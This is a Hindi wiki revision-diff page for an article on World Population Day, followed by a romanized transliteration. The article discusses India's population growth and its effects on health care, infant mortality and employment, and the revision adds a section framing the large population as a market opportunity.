Difference between revisions of "विश्व जनसंख्या दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
भारत में हर एक मिनट में 25 बच्चे पैदा होते हैं। यह आंकड़ा उन बच्चों का है, जो अस्पतालों में जन्म लेते हैं। अभी इसमें गांवों और कस्बों के घरों में पैदा होने वाले बच्चों की संख्या नहीं जुड़ी है। एक मिनट में 25 बच्चों का जन्म यह साफ करता है कि आज चाहे भारत में कितनी भी प्रगति हुई हो या भारत शिक्षित होने का दावा करे, किंतु यह भी एक सच्चाई है कि अब भी देश के लोगों में जागरुकता नाम मात्र की ही आई है। जागरुकता के नाम पर भारत में कई कार्यक्रम चलाए गए- 'हम दो हमारे दो' का नारा लगाया गया, लेकिन लोग 'हम दो हमारे दो' का बोर्ड तो दीवार पर लगा देख लेते हैं, लेकिन घर जाकर उसे बिल्कुल भूल जाते हैं और तीसरे की तैयारी में जुट जाते हैं। भारत में गरीबी, शिक्षा की कमी और बेरोजगारी ऐसे अहम कारक हैं, जिनकी वजह से जनसंख्या का यह विस्फोट प्रतिदिन होता जा रहा है। आज जनसंख्या विस्फोट का आतंक इस कदर छा चुका है कि 'हम दो हमारे दो' का नारा भी अब असफल सा हो गया है। इसलिए भारत सरकार ने नया नारा दिया है- "छोटा परिवार, संपूर्ण परिवार"। छोटे परिवार के कई फायदे हैं- बच्चों को अच्छी परवरिश मिलती है, अच्छी शिक्षा से एक बच्चा दो बच्चों के बराबर कमा सकता है, बच्चे और माँ का स्वास्थ्य हमेशा अच्छा रहता है, जिससे दवाइयों का अतिरिक्त खर्चा बचता है। यह ऐसे फायदे हैं, जो एक छोटे परिवार में होते हैं।<ref name="aa"/>
 
भारत में हर एक मिनट में 25 बच्चे पैदा होते हैं। यह आंकड़ा उन बच्चों का है, जो अस्पतालों में जन्म लेते हैं। अभी इसमें गांवों और कस्बों के घरों में पैदा होने वाले बच्चों की संख्या नहीं जुड़ी है। एक मिनट में 25 बच्चों का जन्म यह साफ करता है कि आज चाहे भारत में कितनी भी प्रगति हुई हो या भारत शिक्षित होने का दावा करे, किंतु यह भी एक सच्चाई है कि अब भी देश के लोगों में जागरुकता नाम मात्र की ही आई है। जागरुकता के नाम पर भारत में कई कार्यक्रम चलाए गए- 'हम दो हमारे दो' का नारा लगाया गया, लेकिन लोग 'हम दो हमारे दो' का बोर्ड तो दीवार पर लगा देख लेते हैं, लेकिन घर जाकर उसे बिल्कुल भूल जाते हैं और तीसरे की तैयारी में जुट जाते हैं। भारत में गरीबी, शिक्षा की कमी और बेरोजगारी ऐसे अहम कारक हैं, जिनकी वजह से जनसंख्या का यह विस्फोट प्रतिदिन होता जा रहा है। आज जनसंख्या विस्फोट का आतंक इस कदर छा चुका है कि 'हम दो हमारे दो' का नारा भी अब असफल सा हो गया है। इसलिए भारत सरकार ने नया नारा दिया है- "छोटा परिवार, संपूर्ण परिवार"। छोटे परिवार के कई फायदे हैं- बच्चों को अच्छी परवरिश मिलती है, अच्छी शिक्षा से एक बच्चा दो बच्चों के बराबर कमा सकता है, बच्चे और माँ का स्वास्थ्य हमेशा अच्छा रहता है, जिससे दवाइयों का अतिरिक्त खर्चा बचता है। यह ऐसे फायदे हैं, जो एक छोटे परिवार में होते हैं।<ref name="aa"/>
 
====जनसंख्या की स्थिति====
 
====जनसंख्या की स्थिति====
सम्पूर्ण विश्व में [[चीन]] को अपनी 1.3 अरब जनसंख्या के चलते विश्व में प्रथम स्थान हासिल है। वहीं दूसरी ओर [[भारत]] भी अपनी 1.2 अरब जनसंख्या के साथ विश्व में दूसरे नंबर पर है। विशेषज्ञों ने चिंता जताई है कि अगर भारत की जनसंख्या इसी दर से बढ़ती रही तो 2030 तक उसे विश्व में प्रथम स्थान हासिल हो जायेगा। अभी हाल के जनसंख्या परिणामों के अनुसार भारत की आबादी 120 करोड़ से अधिक है, जो [[अमेरिका]], इंडोनेशिया, ब्राजील, [[पाकिस्तान]] और [[बांग्लादेश]] की कुल जनंसख्या से ज्यादा है। ध्यान देने योग्य है कि भारत के कई राज्य विकास में भले ही पीछे हों, परन्तु उनकी जनसँख्या विश्व के कई देशो की जनसँख्या से अधिक है, जैसे- [[तमिलनाडु]] की जनसँख्या [[फ़्रांस|फ़्रांस]] की जनसंख्या से अधिक है तो वहीं [[ओडिशा]] अर्जेंटीना से आगे है। [[मध्य प्रदेश]] की जनसंख्या [[थाईलैंड]] से ज्यादा है तो [[महाराष्ट्र]] मेक्सिको के बराबर आ रहा है। [[उत्तर प्रदेश]] ने ब्राजील को पीछे छोड़ा है तो [[राजस्थान]] ने [[इटली]] को पछाड़ा है। [[गुजरात]] ने [[दक्षिण अफ्रीका]] को और [[पश्चिम बंगाल]] ने वियतनाम को पीछे छोड़ा है। यही नहीं भारत के छोटे-छोटे राज्यों, जैसे- [[झारखण्ड]], [[उत्तराखण्ड]], [[केरल]], [[आसाम]] ने भी कई देशों, जैसे- उगांडा, ऑस्ट्रिया, कनाडा, [[उज़्बेकिस्तान]] को बहुत पीछे छोड़ दिया है। अपनी इस उपलब्धि के साथ यह कह सकते है कि भारत में जनसंख्या के आधार पर विश्व के कई देश बसते है। परन्तु यह भी सच है कि भारत के पास विश्व का मात्र 2.4 प्रतिशत क्षेत्र है, परिणामतः संसाधनों के मामले में हम कहीं ज़्यादा पीछे है, जिससे चिंतित होकर एक बार पूर्व ग्रामीण मंत्री रघुवंश प्रसाद ने यहाँ तक कह दिया था कि- "भले ही क्षेत्र और संसाधन के मामले में अमेरिका हमसे आगे हो, परन्तु जनसंख्या के कारण कई अमेरिका [[भारत]] में मौजूद है।"<ref name="ac">{{cite web |url=http://hindi.in.com/latest-news/news/Article-On-World-Population-Day-1446412-0.html|title=भारत में विश्व जनसंख्या दिवस के मायने|accessmonthday=09 जुलाई|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}} </ref>
+
सम्पूर्ण विश्व में [[चीन]] को अपनी 1.3 अरब जनसंख्या के चलते विश्व में प्रथम स्थान हासिल है। वहीं दूसरी ओर [[भारत]] भी अपनी 1.2 अरब जनसंख्या के साथ विश्व में दूसरे नंबर पर है। विशेषज्ञों ने चिंता जताई है कि अगर भारत की जनसंख्या इसी दर से बढ़ती रही तो 2030 तक उसे विश्व में प्रथम स्थान हासिल हो जायेगा। अभी हाल के जनसंख्या परिणामों के अनुसार भारत की आबादी 120 करोड़ से अधिक है, जो [[अमेरिका]], इंडोनेशिया, ब्राजील, [[पाकिस्तान]] और [[बांग्लादेश]] की कुल जनंसख्या से ज्यादा है। ध्यान देने योग्य है कि भारत के कई राज्य विकास में भले ही पीछे हों, परन्तु उनकी जनसंख्या विश्व के कई देशो की जनसंख्या से अधिक है, जैसे- [[तमिलनाडु]] की जनसंख्या [[फ़्रांस|फ़्रांस]] की जनसंख्या से अधिक है तो वहीं [[ओडिशा]] अर्जेंटीना से आगे है। [[मध्य प्रदेश]] की जनसंख्या [[थाईलैंड]] से ज्यादा है तो [[महाराष्ट्र]] मेक्सिको के बराबर आ रहा है। [[उत्तर प्रदेश]] ने ब्राजील को पीछे छोड़ा है तो [[राजस्थान]] ने [[इटली]] को पछाड़ा है। [[गुजरात]] ने [[दक्षिण अफ्रीका]] को और [[पश्चिम बंगाल]] ने वियतनाम को पीछे छोड़ा है। यही नहीं भारत के छोटे-छोटे राज्यों, जैसे- [[झारखण्ड]], [[उत्तराखण्ड]], [[केरल]], [[आसाम]] ने भी कई देशों, जैसे- उगांडा, ऑस्ट्रिया, कनाडा, [[उज़्बेकिस्तान]] को बहुत पीछे छोड़ दिया है। अपनी इस उपलब्धि के साथ यह कह सकते है कि भारत में जनसंख्या के आधार पर विश्व के कई देश बसते है। परन्तु यह भी सच है कि भारत के पास विश्व का मात्र 2.4 प्रतिशत क्षेत्र है, परिणामतः संसाधनों के मामले में हम कहीं ज़्यादा पीछे है, जिससे चिंतित होकर एक बार पूर्व ग्रामीण मंत्री रघुवंश प्रसाद ने यहाँ तक कह दिया था कि- "भले ही क्षेत्र और संसाधन के मामले में अमेरिका हमसे आगे हो, परन्तु जनसंख्या के कारण कई अमेरिका [[भारत]] में मौजूद है।"<ref name="ac">{{cite web |url=http://hindi.in.com/latest-news/news/Article-On-World-Population-Day-1446412-0.html|title=भारत में विश्व जनसंख्या दिवस के मायने|accessmonthday=09 जुलाई|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}} </ref>
 
==स्वास्थय सेवा पर असर==
 
==स्वास्थय सेवा पर असर==
 
देश की बढ़ती जनसंख्या से स्वास्थ्य सेवा भगवान भरोसे ही है, अगर ऐसा माना जाय तो कोई अतिश्योक्ति नहीं होगी। एक तरफ जहाँ चिकित्सा-पर्यटन को बढ़ावा देने की बात की जाती है तो वहीं देश का दूसरा पक्ष कुछ और ही बयान करता है, जिसका अंदाज़ा आये दिन देश के विभिन्न भागों से आये राजधानी [[दिल्ली]] के सरकारी अस्पतालों के आगे जमा भीड़ को देखकर लगाया जा सकता है, जहाँ एक छोटी बीमारी की इलाज के लिए ग्रामीण इलाके के लोगों को दिल्ली स्थित एम्स आना पड़ता है। भारत की स्वास्थ्य सेवा के प्रति जनसंख्या नियंत्रण पर लापरवाही की तस्वीर से अंदाज़ा लगाया जा सकता है। आज भी ग्रामीण क्षेत्रों में शहरों की अपेक्षा मृत्यु-दर ज्यादा है। एक आकड़े के मुताबिक आजादी के इतने वर्षों के बाद भी इलाज़ के अभाव में प्रसव काल में 1000 मे 110 महिलाये दम तोड़ देती हैं। ध्यान देने योग्य है कि यूएनएफपीए के कार्यकारी निदेशक ने प्रसव स्वास्थ्य सेवा पर चिंतित होते हुए कहा है कि- "विश्व भर में प्रतिदिन लगभग 800 से अधिक महिलाये प्रसव के समय दम तोड़ देती हैं। विश्व स्वास्थ्य संगठन की अगर माने तो प्रसव के समय दम तोड़ने वाली महिलाओ में 99 प्रतिशत महिलाये विकाशसील देशों से सम्बंधित हैं, जबकि प्रायः उन्हें बचाया जा सकता है।" सीआईए के आकड़ों के अनुरूप शिशु मृत्यु-दर सबसे कम मोनैको देश में है, जहाँ 1.8 बच्चे ही काल-ग्रसित होते हैं। वहीं [[भारत]] में स्थिति बिलकुल उल्टी है। भारत में आज भी एक हजार बच्चों में से 46 बच्चे काल के शिकार हो जाते हैं और 40 प्रतिशत से अधिक बच्चे कुपोषण के शिकार हो जाते हैं।<ref name="ac"/>
 
देश की बढ़ती जनसंख्या से स्वास्थ्य सेवा भगवान भरोसे ही है, अगर ऐसा माना जाय तो कोई अतिश्योक्ति नहीं होगी। एक तरफ जहाँ चिकित्सा-पर्यटन को बढ़ावा देने की बात की जाती है तो वहीं देश का दूसरा पक्ष कुछ और ही बयान करता है, जिसका अंदाज़ा आये दिन देश के विभिन्न भागों से आये राजधानी [[दिल्ली]] के सरकारी अस्पतालों के आगे जमा भीड़ को देखकर लगाया जा सकता है, जहाँ एक छोटी बीमारी की इलाज के लिए ग्रामीण इलाके के लोगों को दिल्ली स्थित एम्स आना पड़ता है। भारत की स्वास्थ्य सेवा के प्रति जनसंख्या नियंत्रण पर लापरवाही की तस्वीर से अंदाज़ा लगाया जा सकता है। आज भी ग्रामीण क्षेत्रों में शहरों की अपेक्षा मृत्यु-दर ज्यादा है। एक आकड़े के मुताबिक आजादी के इतने वर्षों के बाद भी इलाज़ के अभाव में प्रसव काल में 1000 मे 110 महिलाये दम तोड़ देती हैं। ध्यान देने योग्य है कि यूएनएफपीए के कार्यकारी निदेशक ने प्रसव स्वास्थ्य सेवा पर चिंतित होते हुए कहा है कि- "विश्व भर में प्रतिदिन लगभग 800 से अधिक महिलाये प्रसव के समय दम तोड़ देती हैं। विश्व स्वास्थ्य संगठन की अगर माने तो प्रसव के समय दम तोड़ने वाली महिलाओ में 99 प्रतिशत महिलाये विकाशसील देशों से सम्बंधित हैं, जबकि प्रायः उन्हें बचाया जा सकता है।" सीआईए के आकड़ों के अनुरूप शिशु मृत्यु-दर सबसे कम मोनैको देश में है, जहाँ 1.8 बच्चे ही काल-ग्रसित होते हैं। वहीं [[भारत]] में स्थिति बिलकुल उल्टी है। भारत में आज भी एक हजार बच्चों में से 46 बच्चे काल के शिकार हो जाते हैं और 40 प्रतिशत से अधिक बच्चे कुपोषण के शिकार हो जाते हैं।<ref name="ac"/>
Line 14: Line 14:
 
====रोजी-रोजगार पर प्रभाव====
 
====रोजी-रोजगार पर प्रभाव====
 
एक बच्चे के जन्म के पीछे एक महिला को कम से कम तीन माह की रोजी गंवानी होती है। जितने अधिक बच्चे होंगे, उतनी ही यह अवधि बढ़ती जायेगी। जनसंख्या बढ़ने से रोजगार के ऊपर दबाव और भी बढ़ेगा। देखा जाता है कि बेरोजगारों की पंजी में 8 लाख नाम दर्ज है, जबकि विगत वर्ष भर में मुश्किल से 6-7 हजार लोगों को रोजगार मिल पाया है। ग्रामीण क्षेत्र में रोजगार के अवसर घटने पर लोग शहरों की ओर पलायन करते हैं। शहरों में एकाएक बढ़ी जनसंख्या के आवास की व्यवस्था संभव न होने से लोग झोंपड़-पट्टियों में या मलिन बस्तियाँ बना कर जैसे तैसे आवास करने लगते हैं। इससे मानव गरिमा को ठेस पहुँचती है और मानव अधिकारों का हनन होता है। अस्वास्थ्यकर परिस्थितियों के कारण लोगों में बीमारी फैलती है। बच्चों को शिक्षा व सही परवरिश नहीं मिल पाती। दिन-प्रतिदिन बढ़ती हुई जनसंख्या से मानव के खाने-पीने की वस्तुओं पर भी असर पड़ा है और रोजगार के अवसर सीमित हो गए हैं।
 
एक बच्चे के जन्म के पीछे एक महिला को कम से कम तीन माह की रोजी गंवानी होती है। जितने अधिक बच्चे होंगे, उतनी ही यह अवधि बढ़ती जायेगी। जनसंख्या बढ़ने से रोजगार के ऊपर दबाव और भी बढ़ेगा। देखा जाता है कि बेरोजगारों की पंजी में 8 लाख नाम दर्ज है, जबकि विगत वर्ष भर में मुश्किल से 6-7 हजार लोगों को रोजगार मिल पाया है। ग्रामीण क्षेत्र में रोजगार के अवसर घटने पर लोग शहरों की ओर पलायन करते हैं। शहरों में एकाएक बढ़ी जनसंख्या के आवास की व्यवस्था संभव न होने से लोग झोंपड़-पट्टियों में या मलिन बस्तियाँ बना कर जैसे तैसे आवास करने लगते हैं। इससे मानव गरिमा को ठेस पहुँचती है और मानव अधिकारों का हनन होता है। अस्वास्थ्यकर परिस्थितियों के कारण लोगों में बीमारी फैलती है। बच्चों को शिक्षा व सही परवरिश नहीं मिल पाती। दिन-प्रतिदिन बढ़ती हुई जनसंख्या से मानव के खाने-पीने की वस्तुओं पर भी असर पड़ा है और रोजगार के अवसर सीमित हो गए हैं।
 +
==जनसंख्या एक वरदान==
 +
[[भारत]] की बढ़ती हुई जनसंख्या का एक दूसरा पहलू भी है। चिंता की बजाय यह आने वाले समय में वरदान भी बन सकती है। अगर हम पूंजीपतियों की मानें तो आने वाले समय में खपत की बहुलता के चलते भारत विश्व का सबसे बड़ा बाजार होगा। परिणामतः विश्व के बड़े-बड़े उद्योगपतियों की नजर भारत पर होगी। जिसकी शुरुआत वैश्वीकरण के नाम पर हो चुकी है। उदाहरणार्थ- ऑटोमोबाईल, शीतपेय जैसी कंपनियाँ भारत के हर नागरिक तक अपनी पहुँच बनाने को बेकरार है तो वहीं भारतीय बाजारों में मोबाईल कंपनियों की बाढ़-सी आ गयी है। और तो और भारतीय त्योहारों का भी पूंजीकरण कर समय-समय पर बाजार लोक लुभावने तरीके निकालकर उन्हें आकर्षित करने का प्रयास करता है। आर्थिक सुधार के नाम पर प्रत्यक्ष विदेशी निवेश जैसे भारत-सरकार विश्व के लिए हर संभव रास्ता खोलना चाह रही है। इतना ही नहीं दुनिया के बड़े-बड़े व्यापारी आज भारत में आना चाहते हैं। [[गुजरात]] इसका प्रमुख उदाहरण है। ध्यान देने योग्य है कि गुजरात सरकार कई विदेशी कंपनियों के साथ समझौते कर अपने यहाँ उनकी पूंजी निवेश कराकर विकास में भारत के सभी राज्यों से आगे है। इतना ही नहीं अगर हम एक गैर सरकारी संगठन के आकड़ों की मानें तो आने वाले समय में भारत में नवयुवकों, नवदम्पत्तियों की बहुलता होगी, जिसके चलते ये बाजार का केंद्र बिदु होंगे और इन्हें ध्यान में रखकर वस्तुओं का निर्माण किया जायेगा। भारत में सेवा-क्षेत्र सस्ता होने के कारण यहाँ पर प्रतिष्ठित कपनियों ने अपने-अपने कॉल सेंटर स्थापित किये हैं, जिससे लाखों लोगों को रोजगार उपलब्ध है। [[भारत]] अलग-अलग संस्कृतियों, भाषाओं और विविधता भरे विषयो वाला बाजार है। बाजार की यह विविधता ही वैश्वीकरण के दौर में मनोरंजन कंपनियों को स्थानीय भाषाओं और संस्कृति के हिसाब से वस्तुओ को  बेचने का मौका देती है। बहरहाल दोनों पक्षों को ध्यान में रखकर जनसंख्या में हो रही बेतहासा वृद्धि के चलते सरकार को कुछ ठोस कदम उठाने चाहिए जिससे कि जनसख्या - विस्फोट के कारण हम किसी भयावता तस्वीर से रूबरू होने से  ना हो। इसके साथ - साथ भारत सरकार को प्राथमिक शिक्षा के अलावा कौशल-विकास एवं अनुसंधान - केन्द्रित शिक्षा पर और अधिक ध्यान देने की जरूरत है जिससे कि भारत में नए - नए आविष्कार और अनुसंधान को बढ़ावा मिले। क्योंकि जितने अधिक परिवार शिक्षित एवं जागरूक होंगे उतनी ही शिशु - मृत्युदर और प्रसव  के समय होने वाली महिलाओ की मौत की  सम्भावनाये भी कम होगी। जागरूकता को लेकर भारत - सरकार का  "पल्स-पोलियो उन्मूलन" का अभियान सराहनीय एवं अनुकरणीय है। ध्यान देने योग्य है विश्व स्वास्थ्य संगठन भारत पल्स-पोलियो जैसी गंभीर बीमारी से मुक्त हो चुका है। इसी तर्ज़ पर सरकार को और अधिक प्रयास सभी क्षेत्रो चाहे वह गरीबी-उन्मूलन हो, शिक्षा हो अथवा स्वास्थ्य हो में करना चाहिए  ताकि विश्व जनसंख्या दिवस का भारत में मायने और अधिक बढ़ जाये। 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 11:43, 9 July 2013

vishv janasankhya divas pratyek varsh 11 julaee ko manaya jata hai. atyadhik tez gati se badhati janasankhya ke prati logoan mean jagarookata lane ke uddeshy se hi yah divas manaya jata hai. yah jagarookata manav samaj ki nee pidhiyoan ko behatar jivan dene ka sandesh deti hai. bachchoan ko behatar shiksha, svasthy, vatavaran sahit any avashyak suvidhaean bhavishy mean dene ke lie chhote parivar ki mahati avashyakata nirantar badhati ja rahi hai. prakritik sansadhanoan ka samuchit dohan kar manav samaj ko sarvashreshth banae rakhane aur har iansan ke bhitar insaniyat ko barakarar rakhane ke lie yah bahut jaroori ho gaya hai ki 'vishv janasankhya divas' ki mahatta ko samajha jae.

shuruat

'vishv janasankhya divas' varsh 1987 se manaya ja raha hai. 11 julaee, 1987 mean vishv ki janasankhya 5 arab ko par kar gee thi. tab sanyukt rashtr ne janasankhya vriddhi ko lekar duniya bhar mean jagarookata phailane ke lie yah divas manane ka nirnay liya. tab se is vishesh din ko har sal ek yad aur parivar niyojan ka sankalp lene ke din ke roop mean yad kiya jane laga. har rashtr mean is din ka vishesh mahatv hai, kyooanki aj duniya ke har vikasashil aur vikasit donoan tarah ke desh janasankhya visphot se chiantit haian. vikasashil desh apani abadi aur janasankhya ke bich talamel baithane mean maththapachchi kar rahe haian, to vikasit desh palayan aur rojagar ki chah mean bahar se akar rahane vale sharanarthiyoan ki vajah se pareshan haian.[1]

janasankhya visphot

aj vishv ki janasankhya lagabhag 7 arab se bhi zyada hai. bharat ki janasankhya lagabhag 1 arab, 21 karo d, 1 lakh, 93 hazar, 422 hai.[2] bharat ki pichhale dashak ki janasankhya vriddhi dar 17.64 pratishat hai. vishv ki kul abadi ka adha ya kahean isase bhi adhik hissa eshiyaee deshoan mean hai. chin, bharat aur any eshiyaee deshoan mean shiksha aur jagarukata ki kami ki vajah se janasankhya visphot ke ganbhir khatare saph dikhaee dene lage haian. sthiti yah hai ki agar bharat ne apani janasankhya vriddhi dar par rok nahian lagaee to vah 2030 tak duniya ki sabase b di abadi vala desh ban jaega.

bharat mean bachchoan ka janm

bharat mean har ek minat mean 25 bachche paida hote haian. yah aank da un bachchoan ka hai, jo aspataloan mean janm lete haian. abhi isamean gaanvoan aur kasboan ke gharoan mean paida hone vale bachchoan ki sankhya nahian ju di hai. ek minat mean 25 bachchoan ka janm yah saph karata hai ki aj chahe bharat mean kitani bhi pragati huee ho ya bharat shikshit hone ka dava kare, kiantu yah bhi ek sachchaee hai ki ab bhi desh ke logoan mean jagarukata nam matr ki hi aee hai. jagarukata ke nam par bharat mean kee karyakram chalae ge- 'ham do hamare do' ka nara lagaya gaya, lekin log 'ham do hamare do' ka bord to divar par laga dekh lete haian, lekin ghar jakar use bilkul bhool jate haian aur tisare ki taiyari mean jut jate haian. bharat mean garibi, shiksha ki kami aur berojagari aise aham karak haian, jinaki vajah se janasankhya ka yah visphot pratidin hota ja raha hai. aj janasankhya visphot ka atank is kadar chha chuka hai ki 'ham do hamare do' ka nara bhi ab asaphal sa ho gaya hai. isalie bharat sarakar ne naya nara diya hai- "chhota parivar, sanpoorn parivar". chhote parivar ke kee phayade haian- bachchoan ko achchhi paravarish milati hai, achchhi shiksha se ek bachcha do bachchoan ke barabar kama sakata hai, bachche aur maan ka svasthy hamesha achchha rahata hai, jisase davaiyoan ka atirikt kharcha bachata hai. yah aise phayade haian, jo ek chhote parivar mean hote haian.[1]

janasankhya ki sthiti

sampoorn vishv mean chin ko apani 1.3 arab janasankhya ke chalate vishv mean pratham sthan hasil hai. vahian doosari or bharat bhi apani 1.2 arab janasankhya ke sath vishv mean doosare nanbar par hai. visheshajnoan ne chianta jataee hai ki agar bharat ki janasankhya isi dar se badhati rahi to 2030 tak use vishv mean pratham sthan hasil ho jayega. abhi hal ke janasankhya parinamoan ke anusar bharat ki abadi 120 karo d se adhik hai, jo amerika, iandoneshiya, brajil, pakistan aur baangladesh ki kul janansakhya se jyada hai. dhyan dene yogy hai ki bharat ke kee rajy vikas mean bhale hi pichhe hoan, parantu unaki janasankhya vishv ke kee desho ki janasankhya se adhik hai, jaise- tamilanadu ki janasankhya fraans ki janasankhya se adhik hai to vahian odisha arjeantina se age hai. madhy pradesh ki janasankhya thaeelaiand se jyada hai to maharashtr meksiko ke barabar a raha hai. uttar pradesh ne brajil ko pichhe chho da hai to rajasthan ne itali ko pachha da hai. gujarat ne dakshin aphrika ko aur pashchim bangal ne viyatanam ko pichhe chho da hai. yahi nahian bharat ke chhote-chhote rajyoan, jaise- jharakhand, uttarakhand, keral, asam ne bhi kee deshoan, jaise- ugaanda, aaustriya, kanada, uzbekistan ko bahut pichhe chho d diya hai. apani is upalabdhi ke sath yah kah sakate hai ki bharat mean janasankhya ke adhar par vishv ke kee desh basate hai. parantu yah bhi sach hai ki bharat ke pas vishv ka matr 2.4 pratishat kshetr hai, parinamatah sansadhanoan ke mamale mean ham kahian zyada pichhe hai, jisase chiantit hokar ek bar poorv gramin mantri raghuvansh prasad ne yahaan tak kah diya tha ki- "bhale hi kshetr aur sansadhan ke mamale mean amerika hamase age ho, parantu janasankhya ke karan kee amerika bharat mean maujood hai."[3]

svasthay seva par asar

desh ki badhati janasankhya se svasthy seva bhagavan bharose hi hai, agar aisa mana jay to koee atishyokti nahian hogi. ek taraph jahaan chikitsa-paryatan ko badhava dene ki bat ki jati hai to vahian desh ka doosara paksh kuchh aur hi bayan karata hai, jisaka aandaza aye din desh ke vibhinn bhagoan se aye rajadhani dilli ke sarakari aspataloan ke age jama bhi d ko dekhakar lagaya ja sakata hai, jahaan ek chhoti bimari ki ilaj ke lie gramin ilake ke logoan ko dilli sthit ems ana p data hai. bharat ki svasthy seva ke prati janasankhya niyantran par laparavahi ki tasvir se aandaza lagaya ja sakata hai. aj bhi gramin kshetroan mean shaharoan ki apeksha mrityu-dar jyada hai. ek ak de ke mutabik ajadi ke itane varshoan ke bad bhi ilaz ke abhav mean prasav kal mean 1000 me 110 mahilaye dam to d deti haian. dhyan dene yogy hai ki yooenephapie ke karyakari nideshak ne prasav svasthy seva par chiantit hote hue kaha hai ki- "vishv bhar mean pratidin lagabhag 800 se adhik mahilaye prasav ke samay dam to d deti haian. vishv svasthy sangathan ki agar mane to prasav ke samay dam to dane vali mahilao mean 99 pratishat mahilaye vikashasil deshoan se sambandhit haian, jabaki prayah unhean bachaya ja sakata hai." siaeee ke ak doan ke anuroop shishu mrityu-dar sabase kam monaiko desh mean hai, jahaan 1.8 bachche hi kal-grasit hote haian. vahian bharat mean sthiti bilakul ulti hai. bharat mean aj bhi ek hajar bachchoan mean se 46 bachche kal ke shikar ho jate haian aur 40 pratishat se adhik bachche kuposhan ke shikar ho jate haian.[3]

shishu mrityu dar

bachchoan ko janm dene vali maan ke sharir se jab bar-bar janm lete bachchoan ke roop mean pranik tatv bahar nikalata hai, tab vah kramash: adhik kamajor bachchoan ko janm dene ko vivash hoti hai. ye kamajor bachche agar ek varsh ki umr tak nahian bach pate, to hamari shishu mrityu dar badh jati hai. shishu mrityu dar philahal chhattisagadh mean 70 pratishat prati hajar jivit janm hai, jo ki gramin kshetr mean, jahaan janm dar adhik hai aur shiksha ka star kam hai, 85 hai, tatha shaharoan mean 51 hai. shishu ko janm dete hue kamajor mata ki mrityu bhi ho sakati hai. yahaan adhikatar prasav gharoan mean aprashikshit daee ke dvara hota raha hai, jahaan bhavi mata ki akasmik paricharya, raktadan, shaly chikitsa ki koee vyavastha nahian hoti. aj bhi chhag mean 14 lakh gramin parivar garibi rekha ke niche jite haian, aise mean mata ki khurak mean tatha adhik bachchoan vale parivar mean khanapan ki aparyaptata to bani hi rahati hai.[4]

roji-rojagar par prabhav

ek bachche ke janm ke pichhe ek mahila ko kam se kam tin mah ki roji ganvani hoti hai. jitane adhik bachche hoange, utani hi yah avadhi badhati jayegi. janasankhya badhane se rojagar ke oopar dabav aur bhi badhega. dekha jata hai ki berojagaroan ki panji mean 8 lakh nam darj hai, jabaki vigat varsh bhar mean mushkil se 6-7 hajar logoan ko rojagar mil paya hai. gramin kshetr mean rojagar ke avasar ghatane par log shaharoan ki or palayan karate haian. shaharoan mean ekaek badhi janasankhya ke avas ki vyavastha sanbhav n hone se log jhoanp d-pattiyoan mean ya malin bastiyaan bana kar jaise taise avas karane lagate haian. isase manav garima ko thes pahuanchati hai aur manav adhikaroan ka hanan hota hai. asvasthyakar paristhitiyoan ke karan logoan mean bimari phailati hai. bachchoan ko shiksha v sahi paravarish nahian mil pati. din-pratidin badhati huee janasankhya se manav ke khane-pine ki vastuoan par bhi asar p da hai aur rojagar ke avasar simit ho ge haian.

janasankhya ek varadan

bharat ki badhati huee janasankhya ka ek doosara pahaloo bhi hai. chianta ki bajay yah ane vale samay mean varadan bhi ban sakati hai. agar ham pooanjipatiyoan ki manean to ane vale samay mean khapat ki bahulata ke chalate bharat vishv ka sabase b da bajar hoga. parinamatah vishv ke b de-b de udyogapatiyoan ki najar bharat par hogi. jisaki shuruat vaishvikaran ke nam par ho chuki hai. udaharanarth- aautomobaeel, shitapey jaisi kanpaniyaan bharat ke har nagarik tak apani pahuanch banane ko bekarar hai to vahian bharatiy bajaroan mean mobaeel kanpaniyoan ki badh-si a gayi hai. aur to aur bharatiy tyoharoan ka bhi pooanjikaran kar samay-samay par bajar lok lubhavane tarike nikalakar unhean akarshit karane ka prayas karata hai. arthik sudhar ke nam par pratyaksh videshi nivesh jaise bharat-sarakar vishv ke lie har sanbhav rasta kholana chah rahi hai. itana hi nahian duniya ke b de-b de vyapari aj bharat mean ana chahate haian. gujarat isaka pramukh udaharan hai. dhyan dene yogy hai ki gujarat sarakar kee videshi kanpaniyoan ke sath samajhaute kar apane yahaan unaki pooanji nivesh karakar vikas mean bharat ke sabhi rajyoan se age hai. itana hi nahian agar ham ek gair sarakari sangathan ke ak doan ki manean to ane vale samay mean bharat mean navayuvakoan, navadampattiyoan ki bahulata hogi, jisake chalate ye bajar ka keandr bidu hoange aur inhean dhyan mean rakhakar vastuoan ka nirman kiya jayega. bharat mean seva-kshetr sasta hone ke karan yahaan par pratishthit kapaniyoan ne apane-apane k aaul seantar sthapit kiye haian, jisase lakhoan logoan ko rojagar upalabdh hai. bharat alag-alag sanskritiyoan, bhashaoan aur vividhata bhare vishayo vala bajar hai. bajar ki yah vividhata hi vaishvikaran ke daur mean manoranjan kanpaniyoan ko sthaniy bhashaoan aur sanskriti ke hisab se vastuo ko  bechane ka mauka deti hai. baharahal donoan pakshoan ko dhyan mean rakhakar janasankhya mean ho rahi betahasa vriddhi ke chalate sarakar ko kuchh thos kadam uthane chahie jisase ki janasakhya - visphot ke karan ham kisi bhayavata tasvir se roobaroo hone se  na ho. isake sath - sath bharat sarakar ko prathamik shiksha ke alava kaushal-vikas evan anusandhan - kendrit shiksha par aur adhik dhyan dene ki jaroorat hai jisase ki bharat mean ne - ne avishkar aur anusandhan ko badhava mile. kyoanki jitane adhik parivar shikshit evan jagarook hoange utani hi shishu - mrityudar aur prasav  ke samay hone vali mahilao ki maut ki  sambhavanaye bhi kam hogi. jagarookata ko lekar bharat - sarakar ka  "pals-poliyo unmoolan" ka abhiyan sarahaniy evan anukaraniy hai. dhyan dene yogy hai vishv svasthy sangathan bharat pals-poliyo jaisi ganbhir bimari se mukt ho chuka hai. isi tarz par sarakar ko aur adhik prayas sabhi kshetro chahe vah garibi-unmoolan ho, shiksha ho athava svasthy ho mean karana chahie  taki vishv janasankhya divas ka 